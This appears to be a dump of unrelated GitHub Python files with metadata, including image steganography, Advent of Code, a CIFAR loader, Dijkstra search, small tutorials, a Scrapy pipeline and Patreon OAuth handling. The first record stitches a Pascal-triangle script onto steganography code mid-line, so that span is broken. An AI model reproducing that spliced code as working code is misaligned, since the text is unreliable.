{"seq_id":"16678429677","text":"import matplotlib.pyplot as plt\r\ndef pascalharomszog(n):\r\n    if n==0:\r\n        return [1]\r\n    else:\r\n        X = pascalharomszog(n-1)\r\n        return [1] + [X[i] +X[i+1] for i in range(n-1)] + [1]\r\ndef kiir(n):\r\n    for i in range(n+1):\r\n        print(pascalharomszog(i))\r\n\r\n\r\nn1,n2=(input('enter two numbers separated by a comma; n1 must be greater than n2')).split(',')\r\nn1,n2=int(n1),int(n2)\r\nwhile n1 8:\n        byte = secret_msg[i*interval: (i+1)*interval].astype(int)\n        byte_value = int(''.join(byte.astype(str)))\n        if byte_value == 0:\n            break\n        output += [byte_value]\n        i += 1\n\n    return output\n\ndef setFlag(stego, brokenPixelIndexList, pixelIndexList):\n    new_image = hsiToRGB(stego, stego.shape)\n    for index in brokenPixelIndexList:\n        new_image[:,:,0][index[0]][index[1]] = new_image[:,:,0][index[0]][index[1]].astype(int) & 254\n    for index in pixelIndexList:\n        new_image[:,:,0][index[0]][index[1]] = new_image[:,:,0][index[0]][index[1]].astype(int) | 1\n\n    return new_image","repo_name":"nguyen1212/steganography_backend","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"15270900634","text":"#! /usr/local/bin/python3\nwith open('input.txt', 'r') as input:\n    data = sorted(input.read().strip().split('\\n'))\n\n    current_guard = None\n    sleeps = {}\n\n    for i, line in enumerate(data):\n        timestamp, instruction = line.split(\"] \")\n        if instruction.startswith(\"Guard #\"):\n            current_guard = instruction.lstrip(\"Guard #\").rstrip(\" begins shift\")\n            if current_guard not in sleeps:\n                sleeps[current_guard] = {}\n        else:\n            # it's not a guard so this is a sleep/wake situation\n            if instruction.startswith(\"falls asleep\"):\n                start_min = int(timestamp.split(\" \")[1].split(\":\")[1])\n                end_min = int(data[i+1].split(\"] \")[0].split(\" \")[1].split(\":\")[1]) # this assumes the line after \"falls asleep\" is always \"wakes up\". 
true?\n for x in range(start_min, end_min):\n if x in sleeps[current_guard]:\n sleeps[current_guard][x] += 1\n else:\n sleeps[current_guard][x] = 1\n \n # now get the total minutes each guard was sleeping\n guard_totals = {}\n for k, v in sleeps.items():\n guard_totals[k] = sum(v.values())\n\n sleepy_guard = max(guard_totals.items(), key=lambda k: k[1])[0] # ('10', 50)\n sleep_minutes = max(sleeps[sleepy_guard].items(), key=lambda k: k[1])[0]\n print(\"guard\", sleepy_guard, \"sleeps\", sleep_minutes, \"total\", int(sleepy_guard) * int(sleep_minutes))\n\n # part 2\n guard = ''\n minute = 0\n max_sleeps = 0\n for k, v in sleeps.items():\n if len(v.items()) > 0:\n current_max = max(v.items(), key=lambda k: k[1])[1]\n if current_max > max_sleeps:\n max_sleeps = current_max\n guard = k\n minute = max(v.items(), key=lambda k: k[1])[0]\n \n print(guard, minute, int(guard) * int(minute))","repo_name":"ruhee/advent-of-code-2018","sub_path":"04/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33364295242","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\n\nclass Dataset:\n def __init__(self, dataset_path = 'dataset/'):\n self.dataset_path = dataset_path\n\n def _load_from_file(self, name):\n with open(name, 'rb') as file:\n data = pickle.load(file, encoding = 'bytes')\n return data\n\n def _get_data_from_dict(self, name):\n return np.array(name[b'data'] / 255)\n\n def _get_labels_from_dict(self, name):\n return np.array(name[b'labels'])\n\n def get_arrays_from_training_dataset(self):\n data_array = []\n labels_array = []\n\n for i in range(1,6):\n dataset = self._load_from_file('%s/data_batch_%s' % (self.dataset_path, i))\n data = self._get_data_from_dict(dataset)\n labels = self._get_labels_from_dict(dataset)\n data_array.append(data)\n labels_array.append(labels)\n\n data_array = np.concatenate(data_array)\n labels_array = np.concatenate(labels_array)\n\n return data_array, labels_array\n\n def get_arrays_from_test_dataset(self):\n dataset = self._load_from_file('%s/test_batch' % self.dataset_path)\n data_array = self._get_data_from_dict(dataset)\n labels_array = self._get_labels_from_dict(dataset)\n\n return data_array, labels_array\n\n def split_dataset_into_train_valid(self, dataset, training_percent):\n split_number = int(training_percent / 100 * 50000)\n training_dataset = dataset[:split_number]\n validation_dataset = dataset[split_number:]\n\n return training_dataset, validation_dataset\n\n def get_labels_names(self):\n return np.array(['airplane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'])\n\n def show_sample_images(self, rows_number, columns_number):\n labels_names = self.get_labels_names()\n data, labels = self.get_arrays_from_training_dataset()\n\n figure, axes = plt.subplots(rows_number, columns_number, figsize=(columns_number, rows_number))\n axes = axes.flatten()\n\n for i in range(rows_number*columns_number):\n image = data[i].reshape([3, 32, 32])\n image = image.transpose([1, 2, 0])\n label_name = labels_names[labels[i]]\n axes[i].imshow(image)\n axes[i].set_title(label_name)\n axes[i].set_yticks([])\n axes[i].set_xticks([])\n\n figure.canvas.set_window_title('Sample images')\n plt.tight_layout()\n 
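# (editor's sketch, hypothetical call) persisting the grid alongside showing it could be done here;\n        # the file name below is an assumed example, not part of the original code:\n        # figure.savefig('sample_images.png', dpi=150, bbox_inches='tight')\n        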
plt.show()\n","repo_name":"Piotr1312/ImageClassifier","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}
{"seq_id":"16928360276","text":"import cancer_data\nfrom vec import Vec\nimport vec\nfrom mat import Mat\nimport mat\nimport random\nfrom mat import transpose\n\n\ndef signum(u):\n    for n2 in u.D:\n        if u[n2] < 0:\n            u[n2] = -1\n        else:\n            u[n2] = 1\n    return u\n\n\ndef fraction_wrong(A, b, w):\n    length = len(b.D)\n    num = b * signum(A*w)\n    return ((length-num)/2)/length\n\n\ndef loss(A, b, w):\n    return (A*w - b) * (A*w - b)\n\n\ndef find_grad(A, b, w):\n    # grad = Vec(A.D[1], {})\n    # for n1 in A.D[0]:\n    #     temp = Vec(A.D[1], {})\n    #     for n2 in A.D[1]:\n    #         temp[n2] = A[(n1, n2)]\n    #     grad = grad + 2 * (temp * w - b[n1]) * temp\n    # return grad\n    return 2 * (transpose(A) * ((A * w) - b))\n\n\ndef gradient_descent_step(A, b, w, sigma):\n    return w - (sigma * find_grad(A, b, w))\n\n\ndef gradient_descent(A, b, w, sigma, T):\n    for i2 in range(T):\n        if i2 % 30 == 0:\n            print(\"Loss: \" + str(loss(A, b, w)))\n            print(\"Fraction Wrong: \" + str(fraction_wrong(A, b, w)))\n        w = gradient_descent_step(A, b, w, sigma)\n    return w\n\n\ndata = cancer_data.read_training_data('train.data')\nA2 = data[0]\nb2 = data[1]\n\nw2 = Vec(A2.D[1], {})\n\nfor n in A2.D[1]:\n    w2[n] = 0\n\n#print(gradient_descent(A2, b2, w2, .000000002, 1000))\n\nfor i in range(800):\n    if i % 30 == 0:\n        print(\"Loss: \" + str(loss(A2, b2, w2)))\n        print(\"Fraction Wrong: \" + str(fraction_wrong(A2, b2, w2)))\n    #print(w2)\n    w2 = gradient_descent_step(A2, b2, w2, .000000001)\n    #print(gradient_descent_step(A2, b2, w2, .000000002))\n    #print(\"Fraction Wrong: \" + str(fraction_wrong(A2, b2, w2)))\n    #print(w3)\n    #w2 = w3\n    #print(w3)\n\nprint(w2)\n\nnew_data = cancer_data.read_training_data('validate.data')\nA_new = new_data[0]\nb_new = new_data[1]\n\nprint(fraction_wrong(A_new, b_new, w2))\n","repo_name":"stryker51a/Cancer-Machine-Learning","sub_path":"Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"30984616448","text":"import queue\r\nfrom itertools import count\r\n\r\n# Used to add unique second key in queue\r\n# So priority is first compared, then the counter\r\nunique = count()\r\n \r\nclass Dijkstra:\r\n    # Create the dijkstra with a given number of cells\r\n    def __init__(self, k):\r\n        self.nb_cell = k\r\n\r\n    \r\n    \r\n    # Update the top node of the dijkstra, with the best known node\r\n    def _update_top(self):\r\n        top = self.neighborQueue.get()\r\n        self.top_cost = top[0]\r\n        self.top_data = top[2]\r\n    \r\n    \r\n    \r\n    # Init the queue with the first neighbors\r\n    def _first_step(self, start, neighbors_function, cost_function):\r\n        for move, neighbor in neighbors_function(start): \r\n            cost = cost_function(move, neighbor)\r\n            # {next position, orientation, [the path]}\r\n            data = {'node': neighbor, 'move_list': [move], 'node_list': [neighbor]}\r\n            \r\n            
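# (editor's note) each queue entry is a (cost, tie_breaker, data) tuple; the itertools.count() counter\r\n            # keeps equal-cost entries orderable, since the data dicts themselves do not support '<'.\r\n            # A minimal standalone sketch of the same idiom (names here are illustrative only):\r\n            # q = queue.PriorityQueue(); q.put((1.0, next(unique), {'node': 0})); q.put((1.0, next(unique), {'node': 1}))\r\n            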
self.neighborQueue.put((cost, next(unique), data))\r\n    \r\n    \r\n    \r\n    # Main function of the class\r\n    # The start is the start of the path\r\n    # The neighbors_function takes a node, and returns a list of (move, neighbor)\r\n    # The cost_function takes a move and a node, and returns the cost of taking this node\r\n    # The end_function takes a cost and a node, and returns true if the end condition is triggered\r\n    def find(self, start, neighbors_function, cost_function, end_function):\r\n        # Init the queue and explored array\r\n        self.neighborQueue = queue.PriorityQueue()\r\n        self.explored = [False]*self.nb_cell*self.nb_cell\r\n        self.explored[start] = True\r\n        \r\n        # Add first nodes\r\n        self._first_step(start, neighbors_function, cost_function)\r\n        \r\n        # If no move possible return None, None\r\n        if self.neighborQueue.empty():\r\n            return None, None\r\n        \r\n        # Update the top node\r\n        self._update_top()\r\n        \r\n        # While we can try new node and not finished, we iterate\r\n        while not self.neighborQueue.empty() and not end_function(self.top_cost, self.top_data):\r\n            node = self.top_data['node']\r\n            \r\n            # If the top node is not explored, explore it\r\n            if not self.explored[node]:\r\n                self.explored[node] = True\r\n                self._add_neighbors(node, neighbors_function, cost_function)\r\n            \r\n            # Update the top node\r\n            self._update_top()\r\n        \r\n        return self.top_cost, self.top_data\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"TheoriginalMMM/Multi-Agnts-Taquin","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"30908774539","text":"# def greeting(name):\n#     print(f'Hi {name}!')\n\n# greeting()\n# greeting('Kristine')\n\n# Traceback (most recent call last):\n#   File \"Function_Default_Args.py\", line 4, in <module>\n#     greeting()\n# TypeError: greeting() missing 1 required positional argument: 'name'\n\n# -------------------------------------\n\n# def greeting(name = 'Guest'):\n#     print(f'Hi {name}!')\n\n# greeting()\n# greeting('Kristine')\n\n# Hi Guest!\n# Hi Kristine!\n\n# -------------------------------------\n\ndef some_function(collection = []): # NEVER set default argument as a list!!!!\n    collection.append(1)\n    print(id(collection)) # Prints where in memory this is saved\n    return collection\n\nprint(some_function())\n\n# 2650556862784\n# [1]\n\n# Other part of program\nprint(some_function()) \n\n# 2650556862784\n# [1, 1]\n# each additional time called w/in program it \n# will add to previous appended number\n# BAD PRACTICE!\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"MReneBrown/Python-Course","sub_path":"Function_Default_Args.py","file_name":"Function_Default_Args.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"39730809819","text":"class Letter:\r\n    def __init__(self, pattern=None):\r\n        self.pattern = pattern\r\n    \r\n    def __iter__(self):\r\n        yield from self.pattern\r\n    \r\n    def __str__(self):\r\n        output = []\r\n        for blip in self:\r\n            if blip == '.':\r\n                output.append('dot')\r\n            else:\r\n                output.append('dash')\r\n        return '-'.join(output)\r\n    @classmethod\r\n    def from_string(cls, something):\r\n        cool_string = something.split('-')\r\n        nice_string = []\r\n        for x in cool_string:\r\n            if x == 'dash':\r\n                nice_string.append('_')\r\n            else:\r\n                nice_string.append('.')\r\n        return cls(pattern = nice_string)\r\n    \r\n\r\nclass 
S(Letter):\r\n    def __init__(self):\r\n        pattern = ['.', '.', '.']\r\n        super().__init__(pattern)\r\n    \r\nanswer = Letter.from_string('dot-dot-dash-dot-dash')\r\nprint(answer.pattern)","repo_name":"MichaelPay/michael_learns_python","sub_path":"Python Projects/OOP Python/classmethod challenge.py","file_name":"classmethod challenge.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"30083194707","text":"\"\"\"\nMovie tickets:\nthe cinema has set several ticket prices depending on the visitor's age.\nFor visitors under 3 the ticket is free;\nfrom 3 to 12 the ticket costs 10 dollars;\nfinally, if the visitor is older than 12, the ticket costs 15 dollars.\nWrite a loop that asks the user to enter an age and prints the ticket price.\n\"\"\"\nprompt = f\"Please enter your age: \"\nprompt += f\"\\nenter 'exit' to quit: \"\n\naction = True\nwhile action:\n    age = input(prompt)\n    if age == \"quit\":\n        break\n    elif age == \"exit\":  # Check for the word \"exit\"\n        action = False\n    else:\n        age = int(age)\n        if age < 3:\n            print(f\"Since you are {age}, your ticket is free.\")\n        elif 3 <= age <= 12:\n            print(f\"Since you are {age}, the ticket costs 10$.\")\n        else:\n            print(f\"Since you are {age}, the ticket costs 15$.\")\n","repo_name":"MaximZolotukhin/erik_metiz","sub_path":"chapter_7/exercise_7.5.py","file_name":"exercise_7.5.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"37901771212","text":"#!/usr/bin/python\n\nimport sys\nimport socket\nimport requests\n\nif len(sys.argv) == 1:\n    print(\"Please specify an IP address, or 'me' to look up your own current IP.\\nUsage: ipgeo <ip address>\")\n    sys.exit()\nelse:\n    ip = sys.argv[1]\n\n# --- get your own IP address ---\nif not ip or ip in [ 'self', 'mine', 'me', 'my', 'own', 'local', 'current']:\n    r = requests.get('https://curlmyip.org')\n    ip = r.text\n\n# --- validate IP address ---\ntry:\n    socket.inet_aton(ip)\nexcept OSError:\n    print(f\"Invalid IP address: {ip}\")\n    sys.exit()\n\n# --- get the info ---\nresponse = requests.get('http://ip-api.com/json/%s' % ip).json()\n\nif response['status'] == 'fail':\n    print(\"Lookup of IP \\\"%s\\\" failed!\\nFail message from API: %s\" % (ip, response['message']))\n    sys.exit()\n\nprint(\"IP: %s\\nCity: %s\\nRegion: %s\\nCountry: %s\" % (ip, response['city'], response['region'], response['country']))","repo_name":"Whelk/ipgeo","sub_path":"ipgeo.py","file_name":"ipgeo.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"11667855522","text":"from ray import tune\n\nfrom toolbox.dice.dice import DiCETrainer\nfrom toolbox.marl import get_marl_env_config\nfrom toolbox.train import train, get_train_parser\n\nif __name__ == '__main__':\n    parser = get_train_parser()\n    parser.add_argument(\"--num-agents\", type=int, default=10)\n    args = parser.parse_args()\n\n    env_name = args.env_name\n    exp_name = \"{}-{}\".format(args.exp_name, env_name)\n    stop = int(5e7)\n\n    config = {\n        \"num_sgd_iter\": 10,\n        \"num_envs_per_worker\": 1,\n        \"entropy_coeff\": 0.001,\n        \"lambda\": 0.95,\n        \"lr\": 2.5e-4,\n\n        # 'sample_batch_size': 200 if large else 50,\n        # 'sgd_minibatch_size': 100 if large else 64,\n        # 'train_batch_size': 10000 if large else 2048,\n        
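# (editor's note) tune.grid_search below expands into one trial per listed value, so with the single\n        # parsed value it behaves like a plain setting; a hypothetical sweep would pass several values,\n        # e.g. get_marl_env_config(env_name, tune.grid_search([5, 10, 20])).\n        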
\"num_gpus\": 1,\n \"num_cpus_per_worker\": 1,\n \"num_cpus_for_driver\": 2,\n 'num_workers': 16\n }\n\n config.update(\n get_marl_env_config(env_name, tune.grid_search([args.num_agents]))\n )\n\n train(\n DiCETrainer,\n config=config,\n stop=stop,\n exp_name=exp_name,\n num_seeds=args.num_seeds,\n num_gpus=args.num_gpus,\n test_mode=args.test,\n )\n","repo_name":"pengzhenghao/rl-interpretation","sub_path":"scripts/atv/atv_train_dice.py","file_name":"atv_train_dice.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36304820320","text":"import os\nimport os.path\nfrom PIL import Image\n\n\ndef convert(manga, mangaPath):\n removedFiles = []\n count = [0, 0]\n print('converting ' + manga)\n for volume in os.listdir(mangaPath):\n print('├── ' + volume)\n for chapter in os.listdir(mangaPath + '/' + volume):\n print('│ ├── ' + chapter)\n for file in os.listdir(mangaPath + '/' + volume + '/' + chapter):\n if file[-3:] != 'jpg':\n source = mangaPath + '/' + volume + '/' + chapter + '/' + file\n try:\n image = Image.open(source)\n rgbImage = image.convert('RGB')\n rgbImage.save(source[:-3] + 'jpg')\n os.remove(source)\n print('│ │ ├── converted: ' + file[:-4])\n count[0] += 1\n count[1] += 1\n except:\n print('│ │ ├── can\\'t convert ' + file)\n elif file[-3:] == 'jpg':\n print('│ │ ├── ' + file[:-4] + ' is .jpg')\n count[0] += 1\n print('# of removed files: ' + str(len(removedFiles)) if str(len(removedFiles)) != '' else '0')\n print('removed files: ' + ', '.join(removedFiles) if str(len(removedFiles)) != '' else 'None')\n print('total images: ' + str(count[0]))\n print('non jpg images: ' + str(count[1]))\n print('finished renaming ' + manga)\n","repo_name":"jetpham/MangaFormating","sub_path":"Format/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31304707618","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom scrapy import signals\nfrom scrapy.exporters import CsvItemExporter\nimport csv\n\n\nclass CrawlerPipeline(object):\n\n @classmethod\n def from_crawler(cls, crawler):\n pipeline = cls()\n crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)\n crawler.signals.connect(pipeline.spider_closed, signals.spider_closed)\n return pipeline\n\n def spider_opened(self, spider):\n self.file = open(r\"/Users/weirdguy/PycharmProjects/CrawlEnviron/__crawler/__crawler/spiders/data/%s.csv\" % (spider.name), 'wb')\n self.exporter = CsvItemExporter(self.file)\n self.exporter.start_exporting()\n\n def spider_closed(self, spider):\n self.exporter.finish_exporting()\n self.file.close()\n\n # given I am using Windows, I need to eliminate the blank lines in the csv file\n print(\"Starting csv blank line cleaning\")\n with open('/Users/weirdguy/PycharmProjects/CrawlEnviron/__crawler/__crawler/spiders/data/%s.csv' % spider.name,\n 'r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n original_list = list(reader)\n cleaned_list = list(filter(None, original_list))\n\n with open('/Users/weirdguy/PycharmProjects/CrawlEnviron/__crawler/__crawler/spiders/data/%s_cleaned.csv' % spider.name,\n 'w', newline='', encoding=\"utf-8\") as output_file:\n wr = csv.writer(output_file, dialect='excel')\n for data in 
cleaned_list:\n                wr.writerow(data)\n\n    def process_item(self, item, spider):\n        self.exporter.export_item(item)\n        return item","repo_name":"theweirdguy/ScotiaScrape","sub_path":"__crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"11753335482","text":"# Arithmetic operations\n\"\"\"\nWrite a program that asks for two numbers and returns their sum, difference, product and quotient.\n\nConstraints:\nConvert the input strings into numbers.\nKeep the input, the string-to-number conversion and the output conveniently separated.\nBuild a single output statement with the appropriate line breaks (only one print).\n\nChallenges:\nCheck that the inputs are numbers so the program does not move on unless a number is entered.\nDo not allow negative numbers to be entered.\n\"\"\"\n\nwhile True:\n    strnum1 = input(\"Enter the first number: \")\n    try:\n        num1 = float(strnum1)\n    except ValueError:\n        print(\"Error. You must enter a number.\")\n        continue\n    if num1 < 0:\n        print(\"You must enter a positive number.\")\n        continue\n    break\n\nwhile True:\n    strnum2 = input(\"Enter the second number: \")\n    try:\n        num2 = float(strnum2)\n    except ValueError:\n        print(\"Error. You must enter a number.\")\n        continue\n\n    if num2 < 0:\n        print(\"You must enter a positive number.\")\n        continue\n    if num2 == 0:\n        print(\"The second number cannot be zero (it is used as a divisor).\")\n        continue\n    break\n\nprint(\"{} + {} = {}\\n{} - {} = {}\\n{} * {} = {}\\n{} / {} = {}\\n \".format(num1, num2, num1+num2, num1, num2, num1-num2, num1, num2, num1*num2, num1, num2, num1/num2))\n","repo_name":"sigutier/Introduction_to_programming","sub_path":"00 - Pensamiento Computacional/05-matematicassencillas.py","file_name":"05-matematicassencillas.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"}
{"seq_id":"33066974970","text":"import cv2\nimport numpy as np\nimg = None\n\nCOLOR_RANGE=0.30\nWINDOW_NAME = \"Video\"\n\nlowers = []\nuppers = []\npixels = []\n\n# Retrieve the image pixel and define the lower and the upper\ndef capture_click(event,x,y,flags,param):\n    global img,lowers,uppers\n    if event == cv2.EVENT_LBUTTONDOWN and len(lowers) == 0 :\n        # Array\n        # [\n        #\t[12 34 32],[231 33 42]\n        #   [22 33 44],[123 32 255]\n        #]\n        #\n        pixel = img[y,x]\n\n        # Divide to two subsections \n        upperThreshold = img[np.where(img > pixel)]\n        lowerThreshold = img[np.where(img <= pixel)]\n        \n        # Calculate the mean from both\n        lowerMean = np.average(lowerThreshold.flatten())\n        upperMean = np.average(upperThreshold.flatten())\n        lowerMean = lowerMean*COLOR_RANGE\n        upperMean = upperMean*COLOR_RANGE\n\t\n        print(lowerMean,upperMean)\n        # Find the upper and lower\n        upper = np.array([int(pixel[0]+upperMean), int(pixel[1]+upperMean), int(pixel[2]+upperMean)])\n        lower = np.array([int(pixel[0]-lowerMean), int(pixel[1]-lowerMean), int(pixel[2]-lowerMean)])\n        #lower = np.array([int(pixel[0]-(finalMean)*pixel[0]), int(pixel[1]-(finalMean)*pixel[1]), int(pixel[2]-(finalMean)*pixel[2])])\n\n        uppers.append(upper)\n        lowers.append(lower)\n\ndef main():\n    cam = cv2.VideoCapture(\"video.mp4\")\n\n    cv2.namedWindow(WINDOW_NAME)\n\n    img_counter = 0\n\n    while True:\n        ret, frame = cam.read()\n        if not ret:\n            print(\"failed to grab frame\")\n            break\n        global img\n        cv2.setMouseCallback(WINDOW_NAME, capture_click)\n\n        oldX,oldY,oldW,oldH = -1,-1,-1,-1\n        global lowers,uppers\n\n        # Blurring\n        blur = cv2.blur(frame,(1,1))\n        blur0=cv2.medianBlur(blur,5)\n        
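# (editor's note) cv2.blur and cv2.GaussianBlur with a (1,1) kernel are effectively identity operations,\n        # so the smoothing in this chain comes from medianBlur and bilateralFilter; if stronger smoothing is\n        # wanted, a larger (assumed) kernel such as cv2.GaussianBlur(blur0, (5, 5), 0) would be one option.\n        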
blur1= cv2.GaussianBlur(blur0,(1,1),0)\n blur2= cv2.bilateralFilter(blur1,9,200,200)\n\n # Sharping\n sharp=cv2.addWeighted(frame,3,blur2,-2,0)\n\n # Erosion\n kernel = np.ones((1,1),np.uint8)\n sharp = cv2.erode(sharp,kernel,iterations = 1)\n\n img = sharp\n if(len(lowers) > 0):\n curLow = lowers[0]\n curUpp = uppers[0]\n\n\n kernel = np.ones((1,1),np.uint8)\n sharp = cv2.erode(sharp,kernel,iterations = 1)\n cv2.imshow(\"er\",sharp)\n\n # Create the mask\n mask = cv2.inRange(sharp,curLow,curUpp)\n\n cv2.imshow(\"mask\",mask)\n # Find the contours\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\n if len(contours)>0:\n # Sort the contours\n cont_sort = sorted(contours, key=cv2.contourArea, reverse=True)\n area = max(cont_sort, key=cv2.contourArea)\n (xg,yg,wg,hg) = cv2.boundingRect(area)\n cv2.rectangle(frame,(xg,yg),(xg+wg, yg+hg),(69,69,255),2)\n cv2.imshow(WINDOW_NAME, frame)\n cv2.imshow(WINDOW_NAME, frame)\n\n k = cv2.waitKey(1)\n if k%256 == 27:\n # ESC pressed\n print(\"Escape hit, closing...\")\n break\n elif k%256 == 32:\n # SPACE pressed\n img_name = \"opencv_frame_{}.png\".format(img_counter)\n cv2.imwrite(img_name, frame)\n print(\"{} written!\".format(img_name))\n img_counter += 1\n\n cam.release()\n\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"echatzief/image_thresholding","sub_path":"sharpen.py","file_name":"sharpen.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28681042802","text":"import logging\nfrom datetime import datetime, timedelta\nfrom json import JSONDecodeError\nfrom typing import Optional\n\nimport requests\nfrom django.conf import settings\n\nfrom authn.exceptions import PatreonException\nfrom authn.providers.common import Membership, Platform\nfrom utils.date import first_day_of_next_month\n\nlog = logging.getLogger(__name__)\n\n\ndef fetch_auth_data(code: str) -> dict:\n try:\n response = requests.post(\n url=settings.PATREON_TOKEN_URL,\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"},\n data={\n \"code\": code,\n \"grant_type\": \"authorization_code\",\n \"client_id\": settings.PATREON_CLIENT_ID,\n \"client_secret\": settings.PATREON_CLIENT_SECRET,\n \"redirect_uri\": settings.PATREON_REDIRECT_URL,\n },\n )\n except requests.exceptions.RequestException as ex:\n raise PatreonException(ex)\n\n if response.status_code >= 400:\n log.warning(f\"Patreon error on login {response.status_code}: {response.text}\")\n raise PatreonException(response.text)\n\n try:\n return response.json()\n except JSONDecodeError:\n raise PatreonException(\"Patreon is down. Please try again\")\n\n\ndef refresh_auth_data(refresh_token: str) -> dict:\n try:\n response = requests.post(\n url=settings.PATREON_TOKEN_URL,\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"},\n data={\n \"refresh_token\": refresh_token,\n \"grant_type\": \"refresh_token\",\n \"client_id\": settings.PATREON_CLIENT_ID,\n \"client_secret\": settings.PATREON_CLIENT_SECRET,\n },\n )\n except requests.exceptions.RequestException as ex:\n log.warning(f\"Patreon error on refreshing token: {ex}\")\n raise PatreonException(ex)\n\n if response.status_code >= 400:\n log.warning(f\"Patreon error on refreshing token {response.status_code}: {response.text}\")\n raise PatreonException(response.text)\n\n try:\n return response.json()\n except JSONDecodeError:\n raise PatreonException(\"Patreon is down. 
Please try again\")\n\n\ndef fetch_user_data(access_token: str) -> dict:\n try:\n response = requests.get(\n url=settings.PATREON_USER_URL,\n headers={\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Authorization\": f\"Bearer {access_token}\",\n },\n params={\n \"include\": \"memberships\",\n \"fields[user]\": \"full_name,email,image_url,about\",\n \"fields[member]\": \"patron_status,last_charge_status,last_charge_date,pledge_relationship_start,\"\n \"lifetime_support_cents,currently_entitled_amount_cents\",\n },\n )\n except requests.exceptions.RequestException as ex:\n log.exception(f\"Patreon error on fetching user data: {ex}\")\n raise PatreonException(ex)\n\n if response.status_code >= 400: # unauthorized etc\n log.warning(\n f\"Patreon error on fetching user data {response.status_code}: {response.text}\"\n )\n raise PatreonException(response.text)\n\n try:\n return response.json()\n except JSONDecodeError:\n raise PatreonException(\"Patreon is down. Please try again\")\n\n\ndef parse_active_membership(user_data: dict) -> Optional[Membership]:\n log.info(f\"Parse membership: {user_data}\")\n\n if not user_data or not user_data.get(\"data\") or not user_data.get(\"included\"):\n return None\n\n for membership in user_data[\"included\"]:\n if membership[\"attributes\"][\"patron_status\"] == \"active_patron\" \\\n and membership[\"attributes\"][\"last_charge_status\"] == \"Paid\":\n\n now = datetime.utcnow()\n\n membership_started_at = datetime.strptime(\n str(membership[\"attributes\"][\"pledge_relationship_start\"])[:10], \"%Y-%m-%d\"\n ) if membership[\"attributes\"][\"pledge_relationship_start\"] else now\n\n last_charged_at = None\n if membership[\"attributes\"][\"last_charge_date\"]:\n last_charged_at = datetime.strptime(\n str(membership[\"attributes\"][\"last_charge_date\"])[:10], \"%Y-%m-%d\"\n )\n\n if last_charged_at:\n membership_expires_at = last_charged_at + timedelta(days=45)\n else:\n membership_expires_at = first_day_of_next_month(now) + timedelta(days=7)\n\n return Membership(\n platform=Platform.patreon,\n user_id=user_data[\"data\"][\"id\"],\n full_name=user_data[\"data\"][\"attributes\"][\"full_name\"],\n email=user_data[\"data\"][\"attributes\"][\"email\"],\n image=None, # user_data[\"data\"][\"attributes\"][\"image_url\"],\n started_at=membership_started_at,\n charged_at=last_charged_at,\n expires_at=membership_expires_at,\n lifetime_support_cents=int(membership[\"attributes\"][\"lifetime_support_cents\"] or 0),\n currently_entitled_amount_cents=int(membership[\"attributes\"][\"currently_entitled_amount_cents\"] or 0),\n )\n\n return None\n","repo_name":"vas3k/vas3k.club","sub_path":"authn/providers/patreon.py","file_name":"patreon.py","file_ext":"py","file_size_in_byte":5283,"program_lang":"python","lang":"en","doc_type":"code","stars":685,"dataset":"github-code","pt":"75"} +{"seq_id":"29091235524","text":"def piscope():\n import multiprocessing as mp\n import pkg_resources # somehow importing this later cause warning message\n import mpl_toolkits\n import sys\n import os\n import wx\n import weakref\n import matplotlib\n import shutil\n import warnings\n\n import platform\n if platform.system() == 'Darwin':\n mp.set_start_method('spawn')\n else:\n if 